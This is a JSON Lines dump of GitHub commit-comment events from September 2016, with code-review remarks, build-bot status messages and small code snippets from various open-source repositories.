{"id":"4551361516","type":"CommitCommentEvent","actor":{"login":"Dan-Eli"},"repo":{"name":"Dan-Eli/hello-world"},"payload":{"comment":{"id":18990213,"position":null,"line":null,"path":null,"commit_id":"fe3a40fc5f8a7c1165980959b1278d7697a73911","created_at":"2016-09-12T19:30:01Z","updated_at":"2016-09-12T19:30:01Z","body":"Accepter"}},"created_at":"2016-09-12T19:30:01Z"}
{"id":"4551361998","type":"CommitCommentEvent","actor":{"login":"non"},"repo":{"name":"non/kind-projector"},"payload":{"comment":{"id":18990215,"position":34,"line":190,"path":"README.md","commit_id":"6cd9f1b4969b2b43b1eb64741a2df583bff7a17c","created_at":"2016-09-12T19:30:08Z","updated_at":"2016-09-12T19:30:08Z","body":"Good catch, thanks!"}},"created_at":"2016-09-12T19:30:08Z"}
{"id":"4551364671","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990217,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:30:37Z","updated_at":"2016-09-12T19:30:37Z","body":"Why's this change in this PR?"}},"created_at":"2016-09-12T19:30:37Z"}
{"id":"4551365090","type":"CommitCommentEvent","actor":{"login":"mossprescott"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18990218,"position":15,"line":85,"path":"mongodb/src/main/scala/quasar/physical/mongodb/workflow/package.scala","commit_id":"ac09b920419b658ca38ac66cf8621413740a7e2b","created_at":"2016-09-12T19:30:42Z","updated_at":"2016-09-12T19:30:42Z","body":"A couple of them were missing types, but adding them doesn't seem to help.\r\n\r\nImporting a few specific members does seem to fix it, at least in this file. That works here, since only 3 members are used, but the bigger problem is actually in the test that will be testing literally every op, about 50 in all. I'll try importing them all by name because I think that might still be an improvement in that one case."}},"created_at":"2016-09-12T19:30:42Z"}
{"id":"4551368488","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990224,"position":35,"line":181,"path":"lib/collection/response.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:31:21Z","updated_at":"2016-09-12T19:31:21Z","body":"Don't use self unless needed. It's source a lot of bugs. "}},"created_at":"2016-09-12T19:31:21Z"}
{"id":"4551368858","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18990225,"position":null,"line":null,"path":null,"commit_id":"df77d80dbbd8089846da03943825a079176f3539","created_at":"2016-09-12T19:31:26Z","updated_at":"2016-09-12T19:31:26Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df77d80dbbd8089846da03943825a079176f3539-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df77d80dbbd8089846da03943825a079176f3539-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T19:31:26Z"}
{"id":"4551370675","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990231,"position":24,"line":151,"path":"lib/collection/response.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:31:46Z","updated_at":"2016-09-12T19:31:46Z","body":"Why's this in current PR?"}},"created_at":"2016-09-12T19:31:46Z"}
{"id":"4551372996","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18990237,"position":5,"line":22,"path":"FHEM/14_SD_WS.pm","commit_id":"7c15b54258fef1bb0139322c5804e9fccd873c77","created_at":"2016-09-12T19:32:15Z","updated_at":"2016-09-12T19:32:15Z","body":"Wir könnten es von der Reihenfolge nach hinten stellen, dann kommt hier nur an, was in anderen Modulen nicht verarbeitet wurde"}},"created_at":"2016-09-12T19:32:15Z"}
{"id":"4551378676","type":"CommitCommentEvent","actor":{"login":"TRox1972"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18990252,"position":5,"line":58,"path":".github/ISSUE_TEMPLATE_tmpl.md","commit_id":"546edb2efabb18f9eb0eecb2f8719fcb777e99a7","created_at":"2016-09-12T19:33:21Z","updated_at":"2016-09-12T19:33:21Z","body":"Thanks."}},"created_at":"2016-09-12T19:33:21Z"}
{"id":"4551380267","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990255,"position":18,"line":190,"path":"lib/collection/property.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:33:40Z","updated_at":"2016-09-12T19:33:40Z","body":"Creating a new function on loop is not a good idea."}},"created_at":"2016-09-12T19:33:40Z"}
{"id":"4551382631","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990261,"position":5,"line":179,"path":"lib/collection/property.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:34:11Z","updated_at":"2016-09-12T19:34:11Z","body":"Why do we need self?"}},"created_at":"2016-09-12T19:34:11Z"}
{"id":"4551388475","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18990270,"position":null,"line":null,"path":null,"commit_id":"c6cf109ef9fabfc88cd363869c6f5a936524d90d","created_at":"2016-09-12T19:35:18Z","updated_at":"2016-09-12T19:35:18Z","body":"Okay, done. I forgot that `value` would effect other things.\n\nI implemented the following in flatten_piecewise:\n\nSeparation of conditions and branches based on parity rather than type.\nDetection (but not handling) of inner piecewises in the conditions.\nPrettyprint of proposed modified piecewise output is done in userinfo with\n%piecewise (and no `value`); actual output is ordinary piecewise (no\n%piecewise, no `value`).\n\nOn Sun, Sep 11, 2016 at 11:26 AM, Jacques Carette <notifications@github.com>\nwrote:\n\n> Yes, please put it back to piecewise and remove the value call. value is\n> much too crude (I had missed that!). I recently made that same mistake\n> myself.\n>\n> The problem with value is that it indiscriminately evaluates everything\n> in sight - which is rarely, if ever, what we want in a programmatic\n> context. We want more control, to get more predictability.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/c6cf109ef9fabfc88cd363869c6f5a936524d90d#commitcomment-18977300>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9RZXQq2TLwxS77UivaaPCUDjjeFVks5qpB2wgaJpZM4J5txv>\n> .\n>\n"}},"created_at":"2016-09-12T19:35:18Z"}
{"id":"4551389703","type":"CommitCommentEvent","actor":{"login":"paulp"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18990273,"position":15,"line":85,"path":"mongodb/src/main/scala/quasar/physical/mongodb/workflow/package.scala","commit_id":"ac09b920419b658ca38ac66cf8621413740a7e2b","created_at":"2016-09-12T19:35:32Z","updated_at":"2016-09-12T19:35:32Z","body":"Actually the first thing to do is ascript the type of exprFp itself.\r\n```scala\r\nprivate val exprFp: <whatever-this-is> = ExprOpCoreF.fixpoint[Fix, ExprOpCoreF]\r\n```"}},"created_at":"2016-09-12T19:35:32Z"}
{"id":"4551395146","type":"CommitCommentEvent","actor":{"login":"bryanlandia"},"repo":{"name":"appsembler/edx-theme"},"payload":{"comment":{"id":18990290,"position":null,"line":null,"path":null,"commit_id":"ffaf8b0ecdb07cc97299067ca8a16b604cb2a4e6","created_at":"2016-09-12T19:36:37Z","updated_at":"2016-09-12T19:36:37Z","body":"@grozdanowski I couldn't get sass to compile without escaping these:\r\n\r\n```\r\nedxapp@precise64:~/themes/nxp-dogwood$ sass --version\r\nSass 3.3.5 (Maptastic Maple)\r\nedxapp@precise64:~/themes/nxp-dogwood$ sass --watch -t compressed --sourcemap --scss src/:static/css/\r\n```\r\n\r\nAm I missing something?\r\n\r\n"}},"created_at":"2016-09-12T19:36:37Z"}
{"id":"4551399831","type":"CommitCommentEvent","actor":{"login":"stephiescastle"},"repo":{"name":"stephiescastle/cello-interface"},"payload":{"comment":{"id":18990308,"position":null,"line":null,"path":null,"commit_id":"163174dae600bb6f76591d9430d2b31b627617f5","created_at":"2016-09-12T19:37:32Z","updated_at":"2016-09-12T19:37:32Z","body":"This commit fixed the counter box to accommodate the increased number of scenes"}},"created_at":"2016-09-12T19:37:32Z"}
{"id":"4551400562","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18990311,"position":null,"line":null,"path":null,"commit_id":"172cf7b1fe5297f88d2fc0462f19695c2b3d6c21","created_at":"2016-09-12T19:37:41Z","updated_at":"2016-09-12T19:37:41Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Bb1IjzQ7RRqbt145dq4zSg"}},"created_at":"2016-09-12T19:37:41Z"}
{"id":"4551401870","type":"CommitCommentEvent","actor":{"login":"stinoga"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":18990316,"position":null,"line":null,"path":null,"commit_id":"a863d15092c97fc2db9f94f28a147e20a9d03ed8","created_at":"2016-09-12T19:37:58Z","updated_at":"2016-09-12T19:37:58Z","body":"@bvaughn This looks like exactly what we need to use React Select! What's the best way to implement it so both Create and Async work? I've got the composition setup, but create doesn't seem to be working. I just get \"No Results Found\" when my search is narrowed down past the options list:\r\n\r\n```javascript\r\ngetTags(input, callback) {\r\n// My internal API call, with the react select callback setting the options\r\n  searchCandidateTags(9, input).then(searchResults => {\r\n    callback(null, {\r\n      options: searchResults\r\n    });\r\n  });\r\n}\r\n\r\n// My composed Creatable compoenent\r\nrenderChildren(props) {\r\n  return (\r\n    <Select.Creatable\r\n      {...props}\r\n    />\r\n  );\r\n}\r\n\r\nrender() {\r\n  return (\r\n    <div className={className}>\r\n      <Select.Async\r\n        loadOptions={this.getTags}\r\n        className={styles.inputForm}\r\n        multi={true}\r\n        clearable={false}\r\n        minimumInput={1}\r\n        children={this.renderChildren}\r\n        placeholder={PLACEHOLDER}\r\n        onChange={this.createTag}\r\n        value={tagsList}\r\n        labelKey='name'\r\n        valueKey='id'\r\n      />\r\n```"}},"created_at":"2016-09-12T19:37:58Z"}
{"id":"4551403687","type":"CommitCommentEvent","actor":{"login":"nbey"},"repo":{"name":"SlateFoundation/slate-cbl"},"payload":{"comment":{"id":18990319,"position":null,"line":null,"path":null,"commit_id":"5c2dc1e33084ea890ad89f236491d1c4f0c6518d","created_at":"2016-09-12T19:38:21Z","updated_at":"2016-09-12T19:38:21Z","body":"@themightychris Well, only when querying with a `$searchCondition` that uses joins. In this particular case, searching for a skill join's the competency which has similar/conflicting column names."}},"created_at":"2016-09-12T19:38:21Z"}
{"id":"4551404398","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18990320,"position":null,"line":null,"path":null,"commit_id":"df77d80dbbd8089846da03943825a079176f3539","created_at":"2016-09-12T19:38:28Z","updated_at":"2016-09-12T19:38:28Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df77d80dbbd8089846da03943825a079176f3539-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df77d80dbbd8089846da03943825a079176f3539-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T19:38:28Z"}
{"id":"4551405938","type":"CommitCommentEvent","actor":{"login":"jroweboy"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18990326,"position":null,"line":null,"path":null,"commit_id":"856c19805e166e2dbf7c47a29179058aa40eae85","created_at":"2016-09-12T19:38:47Z","updated_at":"2016-09-12T19:38:47Z","body":"Btw, this error is because the version of Mingw64 on appveyor just doesn't happen to support TaskDialog, so I replaced it with messagebox. (TaskDialog looks so much nicer, but oh well)"}},"created_at":"2016-09-12T19:38:47Z"}
{"id":"4551407321","type":"CommitCommentEvent","actor":{"login":"whatyouhide"},"repo":{"name":"elixir-addicts/rollbax"},"payload":{"comment":{"id":18990335,"position":null,"line":null,"path":null,"commit_id":"378ef57da286a34e7abc3731e579cc79b037ef9c","created_at":"2016-09-12T19:39:03Z","updated_at":"2016-09-12T19:39:03Z","body":"\\cc @mjquinlan2000, I rephrased a bit so that we don't mention `Phoenix.Logger.filter_values/1` since I found out it's actually not part of `Phoenix.Logger`'s public API :) But this should still get the message through, so thanks again for the contribution!"}},"created_at":"2016-09-12T19:39:03Z"}
{"id":"4551413296","type":"CommitCommentEvent","actor":{"login":"Cyclodex"},"repo":{"name":"Cyclodex/cyclone"},"payload":{"comment":{"id":18990354,"position":null,"line":null,"path":null,"commit_id":"8ee1d2e8c6b12f87aee3766004ca2b9a94166489","created_at":"2016-09-12T19:40:15Z","updated_at":"2016-09-12T19:40:15Z","body":"Fixes #5 "}},"created_at":"2016-09-12T19:40:15Z"}
{"id":"4551413702","type":"CommitCommentEvent","actor":{"login":"romogustavo"},"repo":{"name":"romogustavo/crucero"},"payload":{"comment":{"id":18990355,"position":null,"line":null,"path":null,"commit_id":"82cd79c3e42a3bf5da5f0d3af4bd23038cf99e08","created_at":"2016-09-12T19:40:19Z","updated_at":"2016-09-12T19:40:19Z","body":"Commit inicial"}},"created_at":"2016-09-12T19:40:19Z"}
{"id":"4551417074","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18990364,"position":null,"line":null,"path":null,"commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-12T19:40:58Z","updated_at":"2016-09-12T19:40:58Z","body":"The table currently has a composite primary key and not cohort_member as the name. It would be good if you can create a pull request with your changes"}},"created_at":"2016-09-12T19:40:58Z"}
{"id":"4551418482","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"bclozel/spring-framework"},"payload":{"comment":{"id":18990366,"position":104,"line":104,"path":"spring-core/src/main/java/org/springframework/core/codec/ResourceRegionEncoder.java","commit_id":"44bd339afdd7ed46936f9453803131a621b91456","created_at":"2016-09-12T19:41:15Z","updated_at":"2016-09-12T19:41:15Z","body":"This could become more readable with with region markers are extracted into helper methods:\r\n````java\r\nreturn Flux.from(inputStream)\r\n\t\t.concatMap(region -> Flux.concat(\r\n\t\t\t\tgetRegionPrefix(bufferFactory, startBoundary, contentType, region),\r\n\t\t\t\twriteResourceRegion(region, bufferFactory)\r\n\t\t))\r\n\t\t.concatWith(getRegionSuffix(bufferFactory, boundaryString));\r\n````\r\n\r\nAnd the helper methods:\r\n````java\r\nprivate Flux<DataBuffer> getRegionPrefix(DataBufferFactory bufferFactory, byte[] startBoundary,\r\n\t\tbyte[] contentType, ResourceRegion region) {\r\n\r\n\treturn Flux.just(\r\n\t\t   bufferFactory.allocateBuffer(startBoundary.length).write(startBoundary),\r\n\t\t   bufferFactory.allocateBuffer(contentType.length).write(contentType),\r\n\t\t   bufferFactory.wrap(ByteBuffer.wrap(getContentRangeHeader(region)))\r\n   );\r\n}\r\n\r\nprivate Flux<DataBuffer> getRegionSuffix(DataBufferFactory bufferFactory, String boundaryString) {\r\n\tbyte[] endBoundary = getBytes(\"\\r\\n--\" + boundaryString + \"--\");\r\n\treturn Flux.just(bufferFactory.allocateBuffer(endBoundary.length).write(endBoundary));\r\n}\r\n````\r\n\r\n"}},"created_at":"2016-09-12T19:41:15Z"}
{"id":"4551419310","type":"CommitCommentEvent","actor":{"login":"bryanlandia"},"repo":{"name":"appsembler/edx-theme"},"payload":{"comment":{"id":18990370,"position":null,"line":null,"path":null,"commit_id":"1453afddd4c2243c723fbae3fcaed5c54f4fbc99","created_at":"2016-09-12T19:41:24Z","updated_at":"2016-09-12T19:41:24Z","body":"@grozdanowski - Hey, Matej, could you take a quick look at the SCSS in this commit for any suggestions?  This is to style the HTML certs with NXP branding and desired layout.    I'll follow up with a URL to see it in action."}},"created_at":"2016-09-12T19:41:24Z"}
{"id":"4551420612","type":"CommitCommentEvent","actor":{"login":"Lightn1ng"},"repo":{"name":"Lightn1ng/arch_install_script"},"payload":{"comment":{"id":18990375,"position":null,"line":null,"path":null,"commit_id":"b0ecc3cb98f67fc1c18147f0c1037cb04bf9cd52","created_at":"2016-09-12T19:41:39Z","updated_at":"2016-09-12T19:41:39Z","body":"looks good, merging..."}},"created_at":"2016-09-12T19:41:39Z"}
{"id":"4551421608","type":"CommitCommentEvent","actor":{"login":"k3rn3l3rr0r"},"repo":{"name":"k3rn3l3rr0r/bodhi"},"payload":{"comment":{"id":18990378,"position":5,"line":78,"path":"bodhi/server/metadata.py","commit_id":"efab3b8103e0601db7cb0c900aa424378222c4b7","created_at":"2016-09-12T19:41:51Z","updated_at":"2016-09-12T19:41:51Z","body":"@bowlofeggs I'm not sure if I aim in the right direction here. Really, wouldn't like to shoot ourselves in the knee. All test were green and I suppouse that if we use the repomd.xml hardcoded further in the code we should test for it here..."}},"created_at":"2016-09-12T19:41:51Z"}
{"id":"4551423042","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Rehearsal"},"payload":{"comment":{"id":18990384,"position":null,"line":null,"path":null,"commit_id":"3c199fe86a654a15350b38f1caaddbff92c977be","created_at":"2016-09-12T19:42:09Z","updated_at":"2016-09-12T19:42:09Z","body":"@rachitnigam this was causing the issues on TravisCI."}},"created_at":"2016-09-12T19:42:09Z"}
{"id":"4551428209","type":"CommitCommentEvent","actor":{"login":"paulp"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18990394,"position":15,"line":85,"path":"mongodb/src/main/scala/quasar/physical/mongodb/workflow/package.scala","commit_id":"ac09b920419b658ca38ac66cf8621413740a7e2b","created_at":"2016-09-12T19:43:08Z","updated_at":"2016-09-12T19:43:08Z","body":"Oh, you're actually calling a synthetic apply of a case class's companion object. No wonder.\r\n\r\nIt does compile like so:\r\n```scala\r\nprivate val exprFp: ExprOpCoreF.fixpoint[Fix, ExprOpCoreF] = ExprOpCoreF.fixpoint[Fix, ExprOpCoreF]()\r\n```"}},"created_at":"2016-09-12T19:43:08Z"}
{"id":"4551428287","type":"CommitCommentEvent","actor":{"login":"evan70"},"repo":{"name":"jbroadway/elefant"},"payload":{"comment":{"id":18990395,"position":null,"line":null,"path":null,"commit_id":"26e0d4d620748ada07ce082e1e5ee0f359d4888e","created_at":"2016-09-12T19:43:08Z","updated_at":"2016-09-12T19:43:08Z","body":"Nice :) ThX JB"}},"created_at":"2016-09-12T19:43:08Z"}
{"id":"4551428771","type":"CommitCommentEvent","actor":{"login":"namreeb"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18990398,"position":null,"line":null,"path":null,"commit_id":"37e828c3e016d9c7105e22da76123017a2cdff48","created_at":"2016-09-12T19:43:14Z","updated_at":"2016-09-12T19:43:14Z","body":"Seems unlikely to me that this would cause the errors in the message from @xfurry.  A quick look at the commit history shows that this is a more likely culprit: https://github.com/cmangos/mangos-wotlk/commit/0888dca4439522d8774ee22bd496d0e7d123b8e8"}},"created_at":"2016-09-12T19:43:14Z"}
{"id":"4551429710","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"newluck77/fprsmap"},"payload":{"comment":{"id":18990400,"position":17,"line":37,"path":"js/main.js","commit_id":"4ae223217032e27f161ed16ce2cb0010068753b5","created_at":"2016-09-12T19:43:23Z","updated_at":"2016-09-12T19:43:23Z","body":"Yes, `{}` is an empty object initialization (short form of `new Object()`). It is the `initialValue` passed to `reduce()`, which acts as `previousValue` in the first callback call (first iteration). On succesive iterations, `previousValue` is the value `return`ed.\r\n\r\n`currentValue` is `brown` in the first iteration of the callback, with or without `initialValue`, :)"}},"created_at":"2016-09-12T19:43:23Z"}
{"id":"4551430298","type":"CommitCommentEvent","actor":{"login":"PriyatelBot"},"repo":{"name":"PriyatelBot/PriyatelBot"},"payload":{"comment":{"id":18990401,"position":null,"line":null,"path":null,"commit_id":"8f41c31028705c5381b807d6e27b42fa1e506a68","created_at":"2016-09-12T19:43:30Z","updated_at":"2016-09-12T19:43:30Z","body":"# "}},"created_at":"2016-09-12T19:43:30Z"}
{"id":"4551432477","type":"CommitCommentEvent","actor":{"login":"adhg"},"repo":{"name":"adhg/pyDev1"},"payload":{"comment":{"id":18990403,"position":3,"line":3,"path":"office/3d_plot.py","commit_id":"73793d6b8f0cbc831215cb78faceefb9090c2318","created_at":"2016-09-12T19:43:55Z","updated_at":"2016-09-12T19:43:55Z","body":"yep, awesome! "}},"created_at":"2016-09-12T19:43:55Z"}
{"id":"4551440474","type":"CommitCommentEvent","actor":{"login":"vshl"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18990416,"position":null,"line":null,"path":null,"commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-12T19:45:26Z","updated_at":"2016-09-12T19:45:26Z","body":"@wluyima Thanks. I'll create one today. Since CohortService is now using two DAO objects CohortDAO and CohortMemberDAO, I'm trying to figure a way to include them in the same transaction. Is it wise to to do that? Once I figure out, I'll create a new PR."}},"created_at":"2016-09-12T19:45:26Z"}
{"id":"4551442354","type":"CommitCommentEvent","actor":{"login":"gyme987"},"repo":{"name":"eoscari/Clase-4"},"payload":{"comment":{"id":18990422,"position":12,"line":12,"path":"Program.cs","commit_id":"67d5d2dc9a783410ec7672c748340a80fc6242c6","created_at":"2016-09-12T19:45:47Z","updated_at":"2016-09-12T19:45:47Z","body":"//FÑF"}},"created_at":"2016-09-12T19:45:47Z"}
{"id":"4551452398","type":"CommitCommentEvent","actor":{"login":"Alucard648"},"repo":{"name":"Wohlhabend-Networks/PGE-Project"},"payload":{"comment":{"id":18990440,"position":null,"line":null,"path":null,"commit_id":"48908902ee1ad1fd04b86daeea82f1a6df4a2480","created_at":"2016-09-12T19:47:30Z","updated_at":"2016-09-12T19:47:30Z","body":"Character catches hole on downwards moving layer."}},"created_at":"2016-09-12T19:47:30Z"}
{"id":"4551456682","type":"CommitCommentEvent","actor":{"login":"ypid"},"repo":{"name":"opening-hours/opening_hours_map"},"payload":{"comment":{"id":18990448,"position":null,"line":null,"path":null,"commit_id":"1d82098218d08930d2ea225b112e6dc446f8e503","created_at":"2016-09-12T19:48:15Z","updated_at":"2016-09-12T19:48:15Z","body":"Could be done, thanks for the hint but HTTPS is preferred as I might also push those changes to http://openingh.openstreetmap.de/"}},"created_at":"2016-09-12T19:48:15Z"}
{"id":"4551457082","type":"CommitCommentEvent","actor":{"login":"ivo--t"},"repo":{"name":"TWOEARS/identification-training-pipeline"},"payload":{"comment":{"id":18990450,"position":101,"line":101,"path":"src/+FeatureCreators/FeatureSetNSrcDetection.m","commit_id":"4ef22046a3bcfdd103d4839ff5f10c8646e93b08","created_at":"2016-09-12T19:48:19Z","updated_at":"2016-09-12T19:48:19Z","body":"You are only using onset and offset strength of one ear. Is this your intention; and is it reasonable?"}},"created_at":"2016-09-12T19:48:19Z"}
{"id":"4551459582","type":"CommitCommentEvent","actor":{"login":"newluck77"},"repo":{"name":"newluck77/fprsmap"},"payload":{"comment":{"id":18990459,"position":17,"line":37,"path":"js/main.js","commit_id":"4ae223217032e27f161ed16ce2cb0010068753b5","created_at":"2016-09-12T19:48:44Z","updated_at":"2016-09-12T19:48:44Z","body":"Shouldn't `currentValue `be `blue` because `blue` is the first value in the array? See:\r\n\r\n> If initialValue is provided in the call to reduce, then previousValue will be equal to initialValue and currentValue will be equal to the first value in the array."}},"created_at":"2016-09-12T19:48:44Z"}
{"id":"4551461290","type":"CommitCommentEvent","actor":{"login":"rs2"},"repo":{"name":"jupyter-incubator/dashboards_setup"},"payload":{"comment":{"id":18990462,"position":20,"line":16,"path":"docker_deploy/Dockerfile.dashboards","commit_id":"356b0c4c87d64628d2635e4443d76381b020e811","created_at":"2016-09-12T19:49:02Z","updated_at":"2016-09-12T19:49:02Z","body":"This `docker-compose` configuration doesn't seem to serve any `https` service on port 3001. Is there anything that enables the `https` mode?"}},"created_at":"2016-09-12T19:49:02Z"}
{"id":"4551463142","type":"CommitCommentEvent","actor":{"login":"hfossli"},"repo":{"name":"ellefsen/wordpress-heroku-php"},"payload":{"comment":{"id":18990466,"position":null,"line":null,"path":null,"commit_id":"5f8e59624d305cf0c2b2faa7e239bf909e9ecd00","created_at":"2016-09-12T19:49:21Z","updated_at":"2016-09-12T19:49:21Z","body":"Perfect. Thanks :)"}},"created_at":"2016-09-12T19:49:21Z"}
{"id":"4551471161","type":"CommitCommentEvent","actor":{"login":"ivo--t"},"repo":{"name":"TWOEARS/identification-training-pipeline"},"payload":{"comment":{"id":18990489,"position":24,"line":24,"path":"test/nSrcDetection.m","commit_id":"4ef22046a3bcfdd103d4839ff5f10c8646e93b08","created_at":"2016-09-12T19:50:44Z","updated_at":"2016-09-12T19:50:44Z","body":"You should use the multinomial options. I don't know what glmnet does with multinomial data but without the option; and I know that standard BAC will give you faulty/misleading performances with multinomial labels."}},"created_at":"2016-09-12T19:50:44Z"}
{"id":"4551472772","type":"CommitCommentEvent","actor":{"login":"nixel2007"},"repo":{"name":"ytbmulder/language-tie"},"payload":{"comment":{"id":18990492,"position":18,"line":18,"path":"tie.cson","commit_id":"704b38cbb2085c70f6c99e06103f7118d2fe3508","created_at":"2016-09-12T19:50:59Z","updated_at":"2016-09-12T19:50:59Z","body":"@ytbmulder this one `L|l|UL|ul|u|U|F|f|ll|LL|ull|ULL` or `x|X` or even `a-fA-F`"}},"created_at":"2016-09-12T19:50:59Z"}
{"id":"4551475416","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18990500,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T19:51:26Z","updated_at":"2016-09-12T19:51:26Z","body":"Hmm that is a reason. \r\nAlso, the nearest exit may not result in the nearest path (not in the current room and maybe even worse in the next). \r\nMaybe its better to calculate the whole path through all rooms at once. Maybe utilizing the pathfinder. \r\nBut this should be done in a clean and proper way. \r\nThere are also some projects around where something like this is already implemented. Maybe it's worth a look. "}},"created_at":"2016-09-12T19:51:26Z"}
{"id":"4551475940","type":"CommitCommentEvent","actor":{"login":"panzG"},"repo":{"name":"panzG/crp_repository.github.io"},"payload":{"comment":{"id":18990502,"position":null,"line":null,"path":null,"commit_id":"9baf122cc37667f080278b5b15d6b8ce2a9bef36","created_at":"2016-09-12T19:51:31Z","updated_at":"2016-09-12T19:51:31Z","body":"qwe"}},"created_at":"2016-09-12T19:51:31Z"}
{"id":"4551477472","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"encukou/portingguide"},"payload":{"comment":{"id":18990508,"position":null,"line":null,"path":null,"commit_id":"2be4c6cd6c93a4b0f8a75968e35f815ed35394f0","created_at":"2016-09-12T19:51:47Z","updated_at":"2016-09-12T19:51:47Z","body":"I think that first example in Fixer caveat is wrong.\r\n\r\nIf I have file with following content:\r\n```\r\n$ cat keys.py \r\nfor key in somedict.keys():\r\n    print key\r\n```\r\nFixer doesn't change it because it recognize usage of keys() in loop where iterator should remains.\r\n```\r\n$ python-modernize -wf libmodernize.fixes.fix_dict_six keys.py \r\nRefactoringTool: No changes to keys.py\r\nRefactoringTool: Files that need to be modified:\r\nRefactoringTool: keys.py\r\n```\r\nBut if I have a file with just assignment keys from dict to variable\r\n```\r\n$ cat keys2.py \r\nvariable = somedict.keys()\r\n```\r\nfixer change it.\r\n```\r\n$ python-modernize -wf libmodernize.fixes.fix_dict_six keys2.py \r\nRefactoringTool: Refactored keys2.py\r\n--- keys2.py    (original)\r\n+++ keys2.py    (refactored)\r\n@@ -1 +1 @@\r\n-variable = somedict.keys()\r\n+variable = list(somedict.keys())\r\nRefactoringTool: Files that were modified:\r\nRefactoringTool: keys2.py\r\n```\r\n\r\nAnyway, thanks for a lot of new content."}},"created_at":"2016-09-12T19:51:47Z"}
{"id":"4551479213","type":"CommitCommentEvent","actor":{"login":"foreman919"},"repo":{"name":"foreman919/Battleship-Game"},"payload":{"comment":{"id":18990512,"position":null,"line":null,"path":null,"commit_id":"a1ba4f6f11f8648eac81b7e4acd34697b142dd23","created_at":"2016-09-12T19:52:07Z","updated_at":"2016-09-12T19:52:07Z","body":"Battleship.1.py is the code that's work in progress."}},"created_at":"2016-09-12T19:52:07Z"}
{"id":"4551480443","type":"CommitCommentEvent","actor":{"login":"ivo--t"},"repo":{"name":"TWOEARS/identification-training-pipeline"},"payload":{"comment":{"id":18990519,"position":28,"line":28,"path":"test/nSrcDetection.m","commit_id":"4ef22046a3bcfdd103d4839ff5f10c8646e93b08","created_at":"2016-09-12T19:52:17Z","updated_at":"2016-09-12T19:52:17Z","body":"When using more than one source, you have to split into two pipeline runs, because now on source 2 and 3 you have files from the trainset ALWAYS, i.e. also on the test set."}},"created_at":"2016-09-12T19:52:17Z"}
